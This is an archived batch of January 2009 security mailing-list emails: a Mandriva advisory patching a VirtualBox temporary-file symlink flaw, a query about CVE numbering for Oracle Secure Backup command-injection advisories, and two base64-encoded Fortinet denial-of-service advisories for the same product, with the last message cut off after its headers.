Message-Id: <E1LNHyf-0003Cq-39@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:011
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : virtualbox
 Date    : January 14, 2009
 Affected: 2008.0, 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability have been discovered and corrected in VirtualBox,
 affecting versions prior to 2.0.6, which allows local users
 to overwrite arbitrary files via a symlink attack on a
 /tmp/.vbox-qateam-ipc/lock temporary file (CVE-2008-5256).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5256
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 0faad982e37288846205d6d33d590ee1  2008.0/i586/dkms-vboxadd-1.5.0-6.1mdv2008.0.i586.rpm
 ec69afc3908bd606bae77b8422e39558  2008.0/i586/dkms-vboxvfs-1.5.0-6.1mdv2008.0.i586.rpm
 c27d1bd07d9dc67f4cefbdf33472acca  2008.0/i586/dkms-virtualbox-1.5.0-6.1mdv2008.0.i586.rpm
 9964702ee96bcf6c6edf0c31835d20e7  2008.0/i586/virtualbox-1.5.0-6.1mdv2008.0.i586.rpm
 435eb23fb1847074783ee59f21afa05d  2008.0/i586/virtualbox-guest-additions-1.5.0-6.1mdv2008.0.i586.rpm
 dbf4cd4d51e6690ed54a01751d7eb6e3  2008.0/i586/x11-driver-input-vboxmouse-1.5.0-6.1mdv2008.0.i586.rpm
 89984e4e53d3eda593e1a384b97acd14  2008.0/i586/x11-driver-video-vboxvideo-1.5.0-6.1mdv2008.0.i586.rpm 
 d0edb2542a83e4ab966bb9990b9c3a88  2008.0/SRPMS/virtualbox-1.5.0-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 0bfb5b9d8c8a16f1e04fd490e6379e63  2008.0/x86_64/dkms-virtualbox-1.5.0-6.1mdv2008.0.x86_64.rpm
 3bc3251552c50c2ba8270a69c5f353d7  2008.0/x86_64/virtualbox-1.5.0-6.1mdv2008.0.x86_64.rpm 
 d0edb2542a83e4ab966bb9990b9c3a88  2008.0/SRPMS/virtualbox-1.5.0-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 c4e028f64685550f1b54d658cac8033c  2008.1/i586/dkms-vboxadd-1.5.6-1.1mdv2008.1.i586.rpm
 0ba02b82975789a2e074562c266e3880  2008.1/i586/dkms-vboxvfs-1.5.6-1.1mdv2008.1.i586.rpm
 91fb1e876d76370c40f2bc20271dcdbb  2008.1/i586/dkms-virtualbox-1.5.6-1.1mdv2008.1.i586.rpm
 42dd201c14fab3dd1ff218969f88612c  2008.1/i586/virtualbox-1.5.6-1.1mdv2008.1.i586.rpm
 5feeef63896de6093cdd6365258df60d  2008.1/i586/virtualbox-guest-additions-1.5.6-1.1mdv2008.1.i586.rpm
 3d3fc94cb178e2a6853679f01f7f4198  2008.1/i586/x11-driver-input-vboxmouse-1.5.6-1.1mdv2008.1.i586.rpm
 79b78be2abe7b3a6d8e95d547139afa4  2008.1/i586/x11-driver-video-vboxvideo-1.5.6-1.1mdv2008.1.i586.rpm 
 6c18b42e2ff43d79009dedc817fa19e9  2008.1/SRPMS/virtualbox-1.5.6-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 4d261638ff0134079fa6c52d0a368664  2008.1/x86_64/dkms-virtualbox-1.5.6-1.1mdv2008.1.x86_64.rpm
 6ccec4ff2f35d1308f73e10679651ce0  2008.1/x86_64/virtualbox-1.5.6-1.1mdv2008.1.x86_64.rpm 
 6c18b42e2ff43d79009dedc817fa19e9  2008.1/SRPMS/virtualbox-1.5.6-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 53e13912d97abe5b7044887eab1028fd  2009.0/i586/dkms-vboxadd-2.0.2-2.1mdv2009.0.i586.rpm
 9441661b095cf9c65c50c3a81f1fb89b  2009.0/i586/dkms-vboxvfs-2.0.2-2.1mdv2009.0.i586.rpm
 2977fa2971f66d6b554ab73f03b80ba6  2009.0/i586/dkms-virtualbox-2.0.2-2.1mdv2009.0.i586.rpm
 acddf8b8a168c148f1f5e7a548a610bd  2009.0/i586/virtualbox-2.0.2-2.1mdv2009.0.i586.rpm
 edfc2bc624a87ab96f238345fbe38529  2009.0/i586/virtualbox-guest-additions-2.0.2-2.1mdv2009.0.i586.rpm
 e3650d3c5fedb2dccdc4a2e108414b95  2009.0/i586/x11-driver-input-vboxmouse-2.0.2-2.1mdv2009.0.i586.rpm
 6d28714532427680f82c86fe34fee3e0  2009.0/i586/x11-driver-video-vboxvideo-2.0.2-2.1mdv2009.0.i586.rpm 
 93f4904d403da2dd75ca4d444d298846  2009.0/SRPMS/virtualbox-2.0.2-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 667f19d7803c5eb163364ce221b367be  2009.0/x86_64/dkms-vboxadd-2.0.2-2.1mdv2009.0.x86_64.rpm
 e4439eb5b8a5ef7e09924989058a69b8  2009.0/x86_64/dkms-vboxvfs-2.0.2-2.1mdv2009.0.x86_64.rpm
 3da3bc075de10484211b0da29a0a14cc  2009.0/x86_64/dkms-virtualbox-2.0.2-2.1mdv2009.0.x86_64.rpm
 1aba902daf9019cbcf4e62e8a64d0a82  2009.0/x86_64/virtualbox-2.0.2-2.1mdv2009.0.x86_64.rpm
 da486be54760b618a3d84e23c3ad067e  2009.0/x86_64/virtualbox-guest-additions-2.0.2-2.1mdv2009.0.x86_64.rpm
 a3adf7c94132553f43dc6a0cd765bcc8  2009.0/x86_64/x11-driver-input-vboxmouse-2.0.2-2.1mdv2009.0.x86_64.rpm
 ca82cc1b8e6b5d85d1a7601a37367562  2009.0/x86_64/x11-driver-video-vboxvideo-2.0.2-2.1mdv2009.0.x86_64.rpm 
 93f4904d403da2dd75ca4d444d298846  2009.0/SRPMS/virtualbox-2.0.2-2.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbnEzmqjQ0CJFipgRAtaKAKCw/UI12LmoHfiopLbrwfYw9hpjYwCeII/w
cG8DdjRcqRGXazcDy+z623M=XDR6
-----END PGP SIGNATURE-----

From - Thu Jan 15 12:02:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f2
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39191-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C33C3ED949
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:01:19 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 62C7A237412; Thu, 15 Jan 2009 08:42:05 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 1397 invoked from network); 15 Jan 2009 06:22:58 -0000
Date: Thu, 15 Jan 2009 06:46:51 +0000 (UTC)
From: security curmudgeon <jericho@attrition.org>
To: bugtraq@securityfocus.com
Cc: secalert_us@oracle.com, CVE <cve@mitre.org>
Subject: Re: iDefense Security Advisory 01.13.09: Oracle Secure Backup
 Administration Server login.php Command Injection Vulnerability
In-Reply-To: <496D256A.5090502@idefense.com>
Message-ID: <Pine.LNX.4.64.0901150641440.28002@forced.attrition.org>
References: <496D256A.5090502@idefense.com>
X-Attrition: Attrition is only good when forced. http://attrition.org
X-OSVDB: Everything is vulnerable. http://osvdb.org
X-Message-Flag: WARNING: Over 75 security vulnerabilities in Microsoft Outlook as of Feb 15 2008!
X-Copyright: This e-mail copyright 2008 by jericho@attrition.org where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:   


iDefense, CVE or Oracle;

The two iDefense advisories present a bit of confusion over the CVE 
assignments and number of vulnerabilities. There appear to be two 
vulnerabilities (login.php and common.php) that may have 3 CVE numbers 
assigned. Could anyone clarify?

First advisory, mail list post and original jibe suggesting common.php 
issue is CVE-2008-5449:

iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration 
Server login.php Command Injection Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2009-01/0111.html
The vulnerability is in a function of common.php which is called from the 
login.php page.
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-5449 to this issue.

Oracle Secure Backup Administration Server login.php Command Injection 
Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?idv9
The vulnerability is in a function of common.php which is called from the 
login.php page.
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-5449 to this issue.


Second advisory, mail list post and original do not match, mentioning 
CVE-2008-4006 and then CVE-2008-5448 for what appear to be login.php and 
common.php. This implies that common.php may have had two CVE assigned:

iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration 
Server login.php Command Injection Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2009-01/0110.html
The first vulnerability is in "php/login.php".
The second vulnerability is in "php/common.php". 
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-4006 to this issue.

Oracle Secure Backup Administration Server login.php Command Injection 
Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?idv8
The first vulnerability is in "php/login.php". 
The second vulnerability is in "php/common.php".
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
names CVE-2008-4006 and CVE-2008-5448 to this issue. 


Any clarification would be appreciated.

From - Thu Jan 15 12:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39192-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2E12AED949
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:11:05 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D8E6B23741E; Thu, 15 Jan 2009 08:42:42 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4041 invoked from network); 15 Jan 2009 08:57:56 -0000
Message-Id: <200901150921.n0F9LdUw025523@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:24:48 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup Multiple Denial Of Service vulnerabilities
X-mailer: Foxmail 5.0 beta1 [cn]
Mime-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
Content-Transfer-Encoding: base64
Status:   

T3JhY2xlIFNlY3VyZSBCYWNrdXAgTXVsdGlwbGUgRGVuaWFsIE9mIFNlcnZpY2UgdnVsbmVyYWJp
bGl0aWVzDQoyMDA5LkphbnVhcnkuMTMNCg0KRm9ydGluZXQncyBGb3J0aUd1YXJkIEdsb2JhbCBT
ZWN1cml0eSBSZXNlYXJjaCBUZWFtIERpc2NvdmVycyBtdWx0aXBsZSB2dWxuZXJhYmlsaXRpZXMg
aW4gT3JhY2xlIFNlY3VyZSBCYWNrdXANCg0KU3VtbWFyeToNCj09PT09PT09DQoNCk11bHRpcGxl
IERlbmlhbCBPZiBTZXJ2aWNlIHZ1bG5lcmFiaWxpdGllcyBleGlzdCBPcmFjbGUgU2VjdXJlIEJh
Y2t1cCAxMC4yLjAuMiB0aHJvdWdoIG1hbGZvcm1lZCBORE1QIHBhY2tldHMuDQoNCkltcGFjdDoN
Cj09PT09PT0NCg0KUmVtb3RlIERlbmlhbCBPZiBTZXJ2aWNlDQoNClJpc2s6DQo9PT09PQ0KDQpN
ZWRpdW0gKEJhc2UgU2NvcmU6NS4wKQ0KDQpBZmZlY3RlZCBTb2Z0d2FyZToNCj09PT09PT09PT09
PT09PT09PQ0KDQpPcmFjbGUgU2VjdXJlIEJhY2t1cCAxMC4yLjAuMg0KDQpBZGRpdGlvbmFsIElu
Zm9ybWF0aW9uOg0KPT09PT09PT09PT09PT09PT09PT09PT0NCg0KMT5bQ1ZFLTIwMDgtNTQ0MV1T
ZW5kaW5nIGEgbWFsZm9ybWVkIE5ETVAgY29ubmVjdCBvcGVuKE5ETVBfQ09OTkVDVF9PUEVOIGNv
bW1hbmQpIHBhY2tldCB3aWxsIGNhdXNlIGEgY3Jhc2guIA0KMj5bQ1ZFLTIwMDgtNTQ0Ml1TZW5k
aW5nIGEgbWFsZm9ybWVkIE5ETVAgY29ubmVjdCBjbG9zZShORE1QX0NPTk5FQ1RfQ0xPU0UgY29t
bWFuZCkgcGFja2V0IHdpbGwgY2F1c2UgYSBjcmFzaC4gDQozPltDVkUtMjAwOC01NDQzXVNlbmRp
bmcgYSBtYWxmb3JtZWQgTkRNUCBtb3ZlciBnZXQgc3RhdGUoTkRNUF9NT1ZFUl9HRVRfU1RBVEUg
Y29tbWFuZCkgcGFja2V0IHdpbGwgY2F1c2UgYSBjcmFzaC4gDQoNClNvbHV0aW9uczoNCj09PT09
PT09PT0NCg0KVXNlIHRoZSBzb2x1dGlvbiBwcm92aWRlZCBieSBPcmFjbGUgaHR0cDovL3d3dy5v
cmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0
ZXMvY3B1amFuMjAwOS5odG1sDQoNCkZvcnRpbmV0IGN1c3RvbWVycyB3aG8gc3Vic2NyaWJlIHRv
IEZvcnRpbmV0oa9zIGludHJ1c2lvbiBwcmV2ZW50aW9uIChJUFMpIHNlcnZpY2Ugc2hvdWxkIGJl
IHByb3RlY3RlZCBhZ2FpbnN0IHRoZXNlIFJlbW90ZSBEZW5pYWwgT2YNCiBTZXJ2aWNlIHZ1bG5l
cmFiaWxpdGllcy4gRm9ydGluZXShr3MgSVBTIHNlcnZpY2UgaXMgb25lIGNvbXBvbmVudCBvZiBG
b3J0aUd1YXJkIFN1YnNjcmlwdGlvbiBTZXJ2aWNlcywgd2hpY2ggYWxzbyBvZmZlciBjb21wcmVo
ZW5zaXZlIHNvbHV0aW9ucyBzdWNoIGFzIGFudGl2aXJ1cywgV2ViIGNvbnRlbnQgZmlsdGVyaW5n
IGFuZCBhbnRpc3BhbSBjYXBhYmlsaXRpZXMuIFRoZXNlIHNlcnZpY2VzIGVuYWJsZSBwcm90ZWN0
aW9uIGFnYWluc3QgdGhyZWF0cyBvbiBib3RoIGFwcGxpY2F0aW9uIGFuZCBuZXR3b3JrIGxheWVy
cy4gRm9ydGlHdWFyZCBTZXJ2aWNlcyBhcmUgY29udGludW91c2x5IHVwZGF0ZWQgYnkgdGhlIEZv
cnRpR3VhcmQgR2xvYmFsIFNlY3VyaXR5IFJlc2VhcmNoIFRlYW0sIHdoaWNoIGVuYWJsZXMgRm9y
dGluZXQgdG8gZGVsaXZlciBhIGNvbWJpbmF0aW9uIG9mIG11bHRpLWxheWVyZWQgc2VjdXJpdHkg
aW50ZWxsaWdlbmNlIGFuZCB0cnVlIHplcm8tZGF5IHByb3RlY3Rpb24gZnJvbSBuZXcgYW5kIGVt
ZXJnaW5nIHRocmVhdHMuIFRoZXNlIHVwZGF0ZXMgYXJlIGRlbGl2ZXJlZCB0byBhbGwgRm9ydGlH
YXRlLCBGb3J0aU1haWwgYW5kIEZvcnRpQ2xpZW50IHByb2R1Y3RzLiBGb3J0aW5ldCBzdHJpY3Rs
eSBmb2xsb3dzIHJlc3BvbnNpYmxlIGRpc2Nsb3N1cmUgZ3VpZGVsaW5lcyB0byBlbnN1cmUgb3B0
aW11bSBwcm90ZWN0aW9uIGR1cmluZyBhIHRocmVhdCdzIGxpZmVjeWNsZS4NCg0KQWNrbm93bGVk
Z2VtZW50Og0KPT09PT09PT09PT09PT09PQ0KDQpaaGVuaHVhbGl1IGFuZCBYaWFvcGVuZ1poYW5n
IG9mIEZvcnRpbmV0J3MgRm9ydGlHdWFyZCBHbG9iYWwgU2VjdXJpdHkgUmVzZWFyY2ggVGVhbQ0K
DQpSZWZlcmVuY2VzOg0KPT09PT09PT09PT0NCg0KaHR0cDovL3d3dy5mb3J0aWd1YXJkY2VudGVy
LmNvbS9hZHZpc29yeS9GR0EtMjAwOS0wMi5odG1sDQpodHRwOi8vd3d3Lm9yYWNsZS5jb20vdGVj
aG5vbG9neS9kZXBsb3kvc2VjdXJpdHkvY3JpdGljYWwtcGF0Y2gtdXBkYXRlcy9jcHVqYW4yMDA5
Lmh0bWwNCg0KQ1ZFIElEOiBDVkUtMjAwOC01NDQxDQpodHRwOi8vd3d3LmN2ZS5taXRyZS5vcmcv
Y2dpLWJpbi9jdmVuYW1lLmNnaT9uYW1lPTIwMDgtNTQ0MQ0KQ1ZFIElEOiBDVkUtMjAwOC01NDQy
DQpodHRwOi8vd3d3LmN2ZS5taXRyZS5vcmcvY2dpLWJpbi9jdmVuYW1lLmNnaT9uYW1lPTIwMDgt
NTQ0Mg0KQ1ZFIElEOiBDVkUtMjAwOC01NDQzDQpodHRwOi8vd3d3LmN2ZS5taXRyZS5vcmcvY2dp
LWJpbi9jdmVuYW1lLmNnaT9uYW1lPTIwMDgtNTQ0Mw0KDQoKKioqIFRoaXMgZW1haWwgYW5kIGFu
eSBhdHRhY2htZW50cyB0aGVyZXRvIG1heSBjb250YWluIHByaXZhdGUsIGNvbmZpZGVudGlhbCwg
YW5kIHByaXZpbGVnZWQgbWF0ZXJpYWwgZm9yIHRoZSBzb2xlIHVzZSBvZiB0aGUgaW50ZW5kZWQg
cmVjaXBpZW50LiAgQW55IHJldmlldywgY29weWluZywgb3IgZGlzdHJpYnV0aW9uIG9mIHRoaXMg
ZW1haWwgKG9yIGFueSBhdHRhY2htZW50cyB0aGVyZXRvKSBieSBvdGhlcnMgaXMgc3RyaWN0bHkg
cHJvaGliaXRlZC4gIElmIHlvdSBhcmUgbm90IHRoZSBpbnRlbmRlZCByZWNpcGllbnQsIHBsZWFz
ZSBjb250YWN0IHRoZSBzZW5kZXIgaW1tZWRpYXRlbHkgYW5kIHBlcm1hbmVudGx5IGRlbGV0ZSB0
aGUgb3JpZ2luYWwgYW5kIGFueSBjb3BpZXMgb2YgdGhpcyBlbWFpbCBhbmQgYW55IGF0dGFjaG1l
bnRzIHRoZXJldG8uICoqKgo
From - Thu Jan 15 12:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39193-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 58E6EED949
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:21:48 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C8AD8237424; Thu, 15 Jan 2009 08:43:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4059 invoked from network); 15 Jan 2009 08:59:01 -0000
Message-Id: <200901150922.n0F9MotF026221@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:25:58 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup's observiced.exe Denial Of Service vulnerability
X-mailer: Foxmail 5.0 beta1 [cn]
Mime-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
Content-Transfer-Encoding: base64
Status:   

T3JhY2xlIFNlY3VyZSBCYWNrdXAncyBvYnNlcnZpY2VkLmV4ZSBEZW5pYWwgT2YgU2VydmljZSB2
dWxuZXJhYmlsaXR5DQoyMDA5LkphbnVhcnkuMTMNCg0KRm9ydGluZXQncyBGb3J0aUd1YXJkIEds
b2JhbCBTZWN1cml0eSBSZXNlYXJjaCBUZWFtIERpc2NvdmVycyBhIHZ1bG5lcmFiaWxpdHkgaW4g
b2JzZXJ2aWNlZC5leGUgb2YgT3JhY2xlIFNlY3VyZSBCYWNrdXAgDQoNClN1bW1hcnk6DQo9PT09
PT09PQ0KDQpBIERlbmlhbCBPZiBTZXJ2aWNlIHZ1bG5lcmFiaWxpdHkgZXhpc3RzIE9yYWNsZSBT
ZWN1cmUgQmFja3VwIDEwLjIuMC4yIG9ic2VydmljZWQuZXhlIHRocm91Z2ggbWFsZm9ybWVkIHBh
Y2tldC4NCg0KSW1wYWN0Og0KPT09PT09PQ0KDQpSZW1vdGUgRGVuaWFsIE9mIFNlcnZpY2UNCg0K
UmlzazoNCj09PT09DQoNCk1lZGl1bSAoQmFzZSBTY29yZTo1LjApDQoNCkFmZmVjdGVkIFNvZnR3
YXJlOg0KPT09PT09PT09PT09PT09PT09DQoNCk9yYWNsZSBTZWN1cmUgQmFja3VwIDEwLjIuMC4y
DQoNCkFkZGl0aW9uYWwgSW5mb3JtYXRpb246DQo9PT09PT09PT09PT09PT09PT09PT09PQ0KDQpP
cmFjbGUgU2VjdXJlIEJhY2t1cCBsaXN0ZW5zLCBhbmQgcmVjZWl2ZXMgT3JhY2xlJ3MgcHJpdmF0
ZSBQcm90b2NvbCBkYXRhIGluIGEgZGVmYXVsdCBjb25maWd1cmF0aW9uLCBvbiBUQ1AgcG9ydCA0
MDANCkJ5IHNlbmRpbmcgc29tZSBtYWxmb3JtZWQgZGF0YSB0byB0aGlzIHBvcnQgd2lsbCBsZWFk
IERlbmlhbCBPZiBTZXJ2aWNlLg0KDQpTb2x1dGlvbnM6DQo9PT09PT09PT09DQoNClVzZSB0aGUg
c29sdXRpb24gcHJvdmlkZWQgYnkgT3JhY2xlIGh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNobm9s
b2d5L2RlcGxveS9zZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDkuaHRt
bA0KDQpGb3J0aW5ldCBjdXN0b21lcnMgd2hvIHN1YnNjcmliZSB0byBGb3J0aW5ldKGvcyBpbnRy
dXNpb24gcHJldmVudGlvbiAoSVBTKSBzZXJ2aWNlIHNob3VsZCBiZSBwcm90ZWN0ZWQgYWdhaW5z
dCB0aGlzIFJlbW90ZSBEZW5pYWwgT2YgU2VydmljZSANCnZ1bG5lcmFiaWxpdHkuIEZvcnRpbmV0
oa9zIElQUyBzZXJ2aWNlIGlzIG9uZSBjb21wb25lbnQgb2YgRm9ydGlHdWFyZCBTdWJzY3JpcHRp
b24gU2VydmljZXMsIHdoaWNoIGFsc28gb2ZmZXIgY29tcHJlaGVuc2l2ZSBzb2x1dGlvbnMgc3Vj
aCBhcyBhbnRpdmlydXMsIFdlYiBjb250ZW50IGZpbHRlcmluZyBhbmQgYW50aXNwYW0gY2FwYWJp
bGl0aWVzLiBUaGVzZSBzZXJ2aWNlcyBlbmFibGUgcHJvdGVjdGlvbiBhZ2FpbnN0IHRocmVhdHMg
b24gYm90aCBhcHBsaWNhdGlvbiBhbmQgbmV0d29yayBsYXllcnMuIEZvcnRpR3VhcmQgU2Vydmlj
ZXMgYXJlIGNvbnRpbnVvdXNseSB1cGRhdGVkIGJ5IHRoZSBGb3J0aUd1YXJkIEdsb2JhbCBTZWN1
cml0eSBSZXNlYXJjaCBUZWFtLCB3aGljaCBlbmFibGVzIEZvcnRpbmV0IHRvIGRlbGl2ZXIgYSBj
b21iaW5hdGlvbiBvZiBtdWx0aS1sYXllcmVkIHNlY3VyaXR5IGludGVsbGlnZW5jZSBhbmQgdHJ1
ZSB6ZXJvLWRheSBwcm90ZWN0aW9uIGZyb20gbmV3IGFuZCBlbWVyZ2luZyB0aHJlYXRzLiBUaGVz
ZSB1cGRhdGVzIGFyZSBkZWxpdmVyZWQgdG8gYWxsIEZvcnRpR2F0ZSwgRm9ydGlNYWlsIGFuZCBG
b3J0aUNsaWVudCBwcm9kdWN0cy4gRm9ydGluZXQgc3RyaWN0bHkgZm9sbG93cyByZXNwb25zaWJs
ZSBkaXNjbG9zdXJlIGd1aWRlbGluZXMgdG8gZW5zdXJlIG9wdGltdW0gcHJvdGVjdGlvbiBkdXJp
bmcgYSB0aHJlYXQncyBsaWZlY3ljbGUuDQoNCkFja25vd2xlZGdlbWVudDoNCj09PT09PT09PT09
PT09PT0NCg0KWmhlbmh1YWxpdSBhbmQgWGlhb3BlbmdaaGFuZyBvZiBGb3J0aW5ldCdzIEZvcnRp
R3VhcmQgR2xvYmFsIFNlY3VyaXR5IFJlc2VhcmNoIFRlYW0NCg0KUmVmZXJlbmNlczoNCj09PT09
PT09PT09DQoNCmh0dHA6Ly93d3cuZm9ydGlndWFyZGNlbnRlci5jb20vYWR2aXNvcnkvRkdBLTIw
MDktMDIuaHRtbA0KaHR0cDovL3d3dy5vcmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3Vy
aXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1amFuMjAwOS5odG1sDQoNCkNWRSBJRDogQ1ZF
LTIwMDgtNTQ0NQ0KaHR0cDovL3d3dy5jdmUubWl0cmUub3JnL2NnaS1iaW4vY3ZlbmFtZS5jZ2k/
bmFtZT0yMDA4LTU0NDUNCg0K
CioqKiBUaGlzIGVtYWlsIGFuZCBhbnkgYXR0YWNobWVudHMgdGhlcmV0byBtYXkgY29udGFpbiBw
cml2YXRlLCBjb25maWRlbnRpYWwsIGFuZCBwcml2aWxlZ2VkIG1hdGVyaWFsIGZvciB0aGUgc29s
ZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJlY2lwaWVudC4gIEFueSByZXZpZXcsIGNvcHlpbmcsIG9y
IGRpc3RyaWJ1dGlvbiBvZiB0aGlzIGVtYWlsIChvciBhbnkgYXR0YWNobWVudHMgdGhlcmV0bykg
Ynkgb3RoZXJzIGlzIHN0cmljdGx5IHByb2hpYml0ZWQuICBJZiB5b3UgYXJlIG5vdCB0aGUgaW50
ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UgY29udGFjdCB0aGUgc2VuZGVyIGltbWVkaWF0ZWx5IGFu
ZCBwZXJtYW5lbnRseSBkZWxldGUgdGhlIG9yaWdpbmFsIGFuZCBhbnkgY29waWVzIG9mIHRoaXMg
ZW1haWwgYW5kIGFueSBhdHRhY2htZW50cyB0aGVyZXRvLiAqKioK

From - Thu Jan 15 12:32:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f6
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39194-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5DB8FED95B
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:30:59 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 9DF16236FF2; Thu, 15 Jan 2009 08:44:04 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
